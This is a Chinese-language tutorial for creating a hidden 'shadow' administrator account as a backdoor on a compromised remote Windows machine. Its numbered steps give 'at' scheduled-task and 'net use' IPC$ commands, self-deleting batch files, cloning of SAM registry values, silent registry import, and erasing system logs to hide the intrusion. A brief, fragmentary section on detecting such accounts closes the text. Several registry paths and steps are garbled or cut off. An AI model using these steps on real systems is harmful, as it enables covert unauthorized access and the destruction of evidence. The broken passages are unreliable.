遠端控制電腦建立影子帳戶（後門）

步驟：

1、取得遠程電腦的最高許可權（管理員權限），要取得遠程電腦管理員權限的方法很多，難度視對方電腦的防備水平如何。如何取得許可權，就不多介紹了。

2、利用各種工具，開啟遠程電腦的遠端登錄、定時任務服務.server服務功能。

3、編寫“添加系統管理員帳戶”的DOS命令程式，也就是COM或BAT程式，程式要內含運行視窗自動關閉和自我清除功能以便清除痕迹（俗稱擦'屁股')。並上傳這些檔案到對方電腦上（隱藏在不容易發現的角落即可）。

4、為了遠程在對方電腦上運行這些DOS命令，現製作遠程電腦的任務定時計劃（系統層級啟動並執行），在本地DOS環境下輸入如下命令：at \\xx.xx.xx.xx time\\xx.xx.xx.xx\DOS程式的檔案路徑

5、可以通過如下命令測試遠程添加帳戶是否成功：net use \\xx.xx.xx.xx\ipc$ "密碼" /user:"帳戶名稱"，如果顯示遠端連線成功。則添加帳戶成功！

6、退出已經串連的添加帳戶：net use \\xx.xx.xx.xx\ipc$ /del

7、運行本機電腦的regedt32.exe 程式，串連遠程電腦xx.xx.xx.xx，給SAM登錄機碼設定自己擁有的遠程電腦的管理員權限為完全控制。退出regedt32程式。開啟regedit.exe程式，串連遠程電腦註冊表。在SAM下面的項中的,把目前已擁有的系統管理員帳戶的F項索引值複製到添加的系統管理員帳戶對應的F索引值。

8、把遠程電腦上的註冊表上的新系統管理員帳戶索引值匯出，可用如下命令：at \\xx.xx.xx.xx time \\xx.xx.xx.xx\admin$\regedit.exe /e 註冊表名.reg 要匯出的註冊表路徑

9、製作刪除剛添加的系統管理員帳戶的DOS命令程式，並定時在遠程電腦上運行。測試,確保帳戶刪除成功。

10、在遠程電腦上匯入剛才匯出的註冊表：at \\xx.xx.xx.xx time \\xx.xx.xx.xx\admin$\regedit.exe /s 註冊表名.reg (/S,靜默方式匯入）

11、將遠端登錄上的SAM許可權改為只保留系統級帳戶修改的許可權，。也就是還原原許可權。

12、利用MT程式，在遠程電腦上刪除系統記錄的日誌。擦除掉一切顯露你痕迹的尾巴。記得做事要乾淨。

13、遠端連線電腦，用建立的影子帳戶登入。測試成功並查看遠程電腦裡的帳戶裡沒有顯出帳戶即可！

影子帳戶相當於一個administrator帳戶，密碼administrator相同，當administrator密碼變時，影子帳戶密碼不變，而帳戶密碼改變時administrator帳戶密碼跟著改變，常規方法看不到影子帳戶，

只能到註冊表去。
建立影子帳戶步驟如下：
定位 “HKEY_MACHNE\SAM\SAM\Domains\Account\user\Names\Administrator記住就行了)

儲存雙擊匯入註冊表。
《XXX為任意名》
尋找影子帳戶辦法：”開啟註冊表，定位到“HKEY_MACHNE\SAM\SAM\Domains\Account\user\Names\Administrator”查看預設值。
2 “HKEY_MACHNE\SAM\SAM\Domains\Account\user\Names”只要跟上邊值相同就為影子帳戶。
（有時影子帳戶不一定是Administrator的，也可能是普通帳戶的